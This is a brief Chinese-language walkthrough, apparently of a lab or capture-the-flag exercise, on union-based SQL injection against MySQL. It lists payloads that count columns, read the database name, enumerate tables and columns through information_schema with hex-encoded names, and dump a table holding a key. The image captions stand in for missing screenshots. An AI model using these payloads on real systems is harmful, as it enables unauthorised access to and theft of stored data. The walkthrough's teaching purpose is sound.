SQL注入实战-MySQL

漏洞复现

SQL注入实战-MySQL_第1张图片

根据提示用base64进行编码

1 order by 2 (3不行)

SQL注入实战-MySQL_第2张图片

-1 union select 1,database()

SQL注入实战-MySQL_第3张图片

数据库名称用ascll编码加上0x再进行base64编码

-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema =0x74657374

SQL注入实战-MySQL_第4张图片
找到表,接下来爆字段

-1 union select group_concat(column_name),2 from information_schema.columns where table_name=0x64617461

SQL注入实战-MySQL_第5张图片

爆数据

-1 union select 1,(group_concat(id,title,main,thekey) ) from data

SQL注入实战-MySQL_第6张图片

工具注入

SQL注入实战-MySQL_第7张图片

在这里插入图片描述
拿到key
SQL注入实战-MySQL_第8张图片

你可能感兴趣的:(sql注入,sql,mysql,安全)